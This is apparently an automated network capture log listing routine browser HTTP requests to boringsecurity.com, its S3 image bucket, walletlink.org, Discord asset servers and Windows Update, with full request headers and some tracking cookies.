Source: global trafficHTTP traffic detected: GET /thumbnail_poppunk_ac3f59a852.jpeg HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_redzin_temp_1898f990e6.jpeg HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_quit_b3e92694b1.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_5_F_Ry_lya_400x400_c386fc238e.jpeg HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_MAYC_7e6a35562a.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_toven_0ba71c0c46.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_Lazy_Lions_118_4a741f9816.jpeg HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rpc HTTP/1.1Host: www.walletlink.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://boringsecurity.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: qMVfARzqgBrNQZwtsYgaig==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /boringsecurity HTTP/1.1Host: discord.ggConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /invite/boringsecurity HTTP/1.1Host: discord.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/shared.f01e9143e31c19a68a8e.css HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Wf8dpJLvTBPfU2iDh1vsf1vbH.IbLyFk4yg_iaAqREA-1702226707253-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/app.83f01b3df65cd0fa3bb9.css HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Wf8dpJLvTBPfU2iDh1vsf1vbH.IbLyFk4yg_iaAqREA-1702226707253-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/shared.ffb9488d8d48f9a02fdf.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Wf8dpJLvTBPfU2iDh1vsf1vbH.IbLyFk4yg_iaAqREA-1702226707253-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/app.8f4aee4adf549cf3ee04.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Wf8dpJLvTBPfU2iDh1vsf1vbH.IbLyFk4yg_iaAqREA-1702226707253-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/3726.e3e95df69f8cf8ff7aa8.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=dPS26sSQJQbE3uPVddYoKuGobua4yJj6RAT9CXWe_4s-1702226708068-0-604800000
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FNTl6mFZVU2Yvoy&MD=3dvdtXe6 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /assets/51301.032f682bd3663cc3e88c.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=dPS26sSQJQbE3uPVddYoKuGobua4yJj6RAT9CXWe_4s-1702226708068-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/21396.259a270b7e3f8803a333.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=dPS26sSQJQbE3uPVddYoKuGobua4yJj6RAT9CXWe_4s-1702226708068-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/61160.b9c554bf37895ed48683.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=dPS26sSQJQbE3uPVddYoKuGobua4yJj6RAT9CXWe_4s-1702226708068-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/22918.9f2b9d54bbfc371a4d92.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=dPS26sSQJQbE3uPVddYoKuGobua4yJj6RAT9CXWe_4s-1702226708068-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/13798.5d1df801cfc219755d66.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=dPS26sSQJQbE3uPVddYoKuGobua4yJj6RAT9CXWe_4s-1702226708068-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/63550.a619020e4c7b3d5be7ac.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=ZSpCVMywQiiVfPT7vOGew6YWOI9N27ZE4E8DXhnYM1s-1702226709260-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/482.6e1c86f88a37a71d42ec.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=ZSpCVMywQiiVfPT7vOGew6YWOI9N27ZE4E8DXhnYM1s-1702226709260-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/19263.fe32553ff71153cb7656.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=ZSpCVMywQiiVfPT7vOGew6YWOI9N27ZE4E8DXhnYM1s-1702226709260-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/10991.d742d0d238c0d99e96ae.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=ZSpCVMywQiiVfPT7vOGew6YWOI9N27ZE4E8DXhnYM1s-1702226709260-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/20117.7c4ea5cd4685b0442b9f.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=6rPx99.138aSgsi.Saw4lDXW2Yvp_ZooijdsDQ1L9wo-1702226709386-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/31897.ec700144df6b20f401cb.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=6rPx99.138aSgsi.Saw4lDXW2Yvp_ZooijdsDQ1L9wo-1702226709386-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/58409.1811376ebb7f14b0be53.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=2bIu3pS.WG1lwb9eF4QGX6YSbwT0Qolrhtq2ML2K9a8-1702226709995-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/49554.34f5589cb37c5b3e60d3.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=W6_D4Wxsd09Iulxu8Obu7jWyxiMdtvIcsXvnOFB7Ydw-1702226710002-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/69288.312b5f484a6756663ca9.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=lOSGVmnCqYZ0_GjH00L_Li4AJCc.ccsJtoqTjSV1Ef4-1702226710006-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/3341.1a1f8595a0c8fc9f99cf.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=DaO5EQhl_DZH5MV15WMVj.asDWNBImLONYMAHnieNNQ-1702226710025-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/64999.3c0486790babc24c66a4.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=DaO5EQhl_DZH5MV15WMVj.asDWNBImLONYMAHnieNNQ-1702226710025-0-604800000
